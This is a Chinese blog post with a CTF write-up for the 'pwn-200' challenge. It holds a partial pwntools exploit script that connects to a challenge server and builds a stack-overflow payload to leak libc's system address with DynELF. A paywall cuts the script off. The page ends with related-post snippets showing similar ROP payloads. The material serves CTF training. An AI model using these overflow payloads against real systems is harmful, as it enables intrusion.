XCTF-PWN pwn-200(使用DynELF利用write泄露system地址)

最新推荐文章于 2022-12-23 12:29:18 发布
最新推荐文章于 2022-12-23 12:29:18 发布
阅读量352 收藏
点赞数
分类专栏: CTF-PWN 文章标签: 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qin9800/article/details/104968261
版权

pwn-200

题目下载地址:

点此下载

查保护

在这里插入图片描述
只开启了NX
查看是否有后面函数,没有!所以需要利用DynELF泄露system地址获取shell。
这题比较简单,就不写详细解释了,直接上EXP。

EXP:

DynELF解法

# -*- coding: utf-8 -*-
# @Author: 夏了茶糜
# @Date:   2020-03-19 14:01:14
# @email: sxin0807@qq.com
# @Last Modified by:   夏了茶糜
# @Last Modified time: 2020-03-19 15:03:12

from pwn import *

context(arch="amd64",os="linux")
context.log_level="debug"
p = remote("111.198.29.45",37468)
elf = ELF("./pwn-200")
write_addr = elf.plt["write"]
read_plt = elf.plt["read"]
start = 0x080483D0
bss = elf.bss()
pop_3 = 0x0804856c
def leak(address):
	p.recvuntil("Welcome to XDCTF2015~!\n")
	payload = 0x6c * 'a' + 0x4 * 'b' + p32(write_addr) + p32(start) + p32(1
最低0.47元/天 解锁文章
夏了茶糜
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
攻防世界 pwn进阶区 pwn-200
Kni9hT's Blog
03-04 1707
前言 一到夜晚就不太想睡…想了想还是把昨天(不,前天 )的那题pwn writeup写了吧。虚假の二进制选手终于捡起了他的pwn…话说从web新手区转到pwn进阶区,wtnl。 学习要点 DynELF使用 plt地址和got地址的区别 如何利用write函数 思考 题目的逻辑不难,开启了NX防护(即不能直接执行栈上的数据,通常使用ROP,本题就是),没有给libc地址,有个明显的栈溢出漏...
pwn-200(xctf)
weixin_43868725的博客
08-08 605
0x0 程序保护和流程 保护: 流程: main() overflow() 明显的栈溢出漏洞。 0x1 利用过程 1.由于题目没有给出libc的版本,所以需要通过pwntools中的DynELF或者Libcsearch得出libc的版本。 2.如果使用DynELF则需要向内存写入**/bin/sh**,而Libcsearch则不用。 3.payload的构造(以DynELF为例): payload=padding+p32(read_plt)+p32(ppp_addr)+p32(0)+p32(bss_
XCTF PWN高手进阶区之pwn-200
neuisf的博客
01-29 639
此题,setbuf未发现有什么作用! exp: from pwn import * sub_addr=0x8048484 def leak(addr): payload=‘a’*112+p32(write_plt)+p32(sub_addr)+p32(1)+p32(addr)+p32(4) p.sendline(payload) return p.recv()[:4] p=process("./p...
pwn200 [XCTF-PWN][高手进阶区]CTF writeup攻防世界题解系列21
重新启程
12-25 1301
题目地址pwn-200 不知不觉已经到了高级进阶区的第十题了,攻防世界设计的学习过程,确实降低了学习曲线的陡峭程度。 废话不说,看看题目先 看一下难度星级陡然提升到5颗星,心里是不是有点懵逼!哈哈 先看看保护机制: [*] '/ctf/work/python/pwn200/9c6084f8a3b2473e8a9e9815099bfec5' Arch: i386-32-...
Jarvis OJ-pwn level4(利用DynElf泄漏system地址
hanqdi_的博客
02-07 209
pwn level4 借助DynELF实现无libc的漏洞:这篇讲的挺好 检查保护机制 ida打开文件,发现read函数栈溢出漏洞,想要用ret2libc解决,但是在漏洞函数前没有其他函数执行,所以不能进行泄漏函数得到libc版本。 在无libc情况下,通过DynELF进行泄漏system函数。有了system地址,但是没有binsh字符串,这里可以通过read函数,从标准输入,写到bss...
XCTF-RE】新手练习区-open-source.c
08-03
题目:https://adworld.xctf.org.cn/task/task_list?type=reverse&number=4&grade=0&page=1 我的解题记录:https://www.yuque.com/jianouzuihuai/study/zgwso7
XCTF-HW-pipeline附件
最新发布
11-09
附件
XCTF-RE】新手练习区-csaw2013reversing2.exe
08-03
题目:https://adworld.xctf.org.cn/task/task_list?type=reverse&number=4&grade=0&page=1 我的解题记录:https://www.yuque.com/jianouzuihuai/study/ova41g
XCTF-Mobile】新手练习区-12.rar
09-01
题目:https://adworld.xctf.org.cn/task/answer?type=mobile&number=6&grade=0&id=5095&page=1 我的解题记录:https://www.yuque.com/jianouzuihuai/ctf/hackermind
XCTF mfc逆向-200
12-22
查壳 vmp。。。 看了大佬博客后得知解法 ...由于我的电脑上没有Windows的开发环境,使用python写个程序 发送成功 程序变成这个样子 计算flag 得到flag:thIs_Is_real_kEy_hahaaa 作者:夏了茶糜
(攻防世界)(XDCTF-2015)pwn200
PLpa的博客
07-13 2186
这一题和JarvisOJ中的level4简直不要太像了,只是改变了几个地址,改变了溢出点。 既然前面已经讲解了,这里就不再重复讲了,详细解法请看链接:https://blog.csdn.net/qq_43986365/article/details/95081996 完整exp如下: #! /usr/bin/env python from pwn import * p=remote('111.19...
xctf-pwn-“time_formatter & pwn-200 & pwn-100“
njh18790816639的博客
07-28 120
time_formatter Unix是20世纪70年代初出现的一个操作系统,除了作为网络操作系统之外,还可以作为单机操作系统使用。Unix作为一种开发平台和台式操作系统获得了广泛使用,目前主要用于工程应用和科学计算等领域。 再补上保护措施! 既然知道了保护措施,我们再来看看函数! ...
sctf pwn200
weixin_30363981的博客
04-04 233
  题目给出了pwn200和libc.so。使用IDA查看程序,发现逻辑很简单。   使用checksec查看pwn200安全属性,如下图:      发现NX enabled,No PIE。   在第一次读(0x08048524位置)的时候,可以读取17个字节,观察栈结构:   发现可以将nbytes覆盖,可以覆盖为0xff。   在第二次读(0x08048596位置)的时候,...
攻防世界pwn——pwn-200
qq_62076255的博客
12-23 411
做题记录
[攻防世界 pwn]——pwn-200
Y_peak的博客
02-20 590
[攻防世界 pwn]——pwn-200 题目地址: https://adworld.xctf.org.cn/ 题目: peak小知识 ret2libc的题型, 一般给一个输出和一个输入的函数, 输入一般可以栈溢出。但是没有system和"/bin/sh"。首先, 利用已知的函数leek出来一个地址返回地址是可循环调用的地方,一般是用puts,或者write函数leek地址, 偶尔有时是printf函数, 然后找出libc版本计算偏移, 找到system和’/bin/sh’ 地址。重新构造rop链进而获
攻防世界XCTF新手区pwn
weixin_45948183的博客
03-24 678
0x00get_shell 第一个比较简单,直接看IDA里面的源码,da进入main函数查看,有system和bin/sh 直接nc连接就可以拿到flag 0x01CGfsb 先看一下保护机制 IDA里面看一下 可以看出当pwnme=8,就可以拿到flag,然后怎么使pwnme=8呢? 可以看出printf哪里存在格式化字符漏洞,由于printf()函数使用不当,造成任意内存读写,通常使用%...
XDCTF2015 PWN200
Bill
03-01 1712
XDCTF 2015 PWN200 一. 源码(自己敲出来的) #include <stdio.h> #include <unistd.h> #include <string.h> int vuln(){ char buf[80]; setbuf(stdin, buf); return read(0, buf, 256)...
xdctf2015_pwn200
m0sway的博客
11-30 1785
xdctf2015_pwn200.py 使用checksec查看: 只开启了栈溢出。 拉进IDA中查看: main()中直接给出了漏洞函数,跟进查看: 一个简单明了的栈溢出。距离ebp0x6c 用write()函数泄露libc。 exp: from pwn import * #start r = remote("node4.buuoj.cn",27929) # r = process("../buu/xdctf2015_pwn200") elf = ELF("../buu/xdctf2015_p
[PWN] 泄露libc HarekazeCTF_2019_baby_rop2
LDX的博客
11-28 660
pwn 64位 泄露libc版本
攻防世界pwn新手题答案
08-10
回答: 对于攻防世界pwn新手题,其中一个关键是要修改全局变量pwnme的内容。通过格式化字符串的方法,可以实现这个目标。格式化字符串的原理是利用输入的格式化字符串,修改内存中的指定位置的值。具体的方法可以参考...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值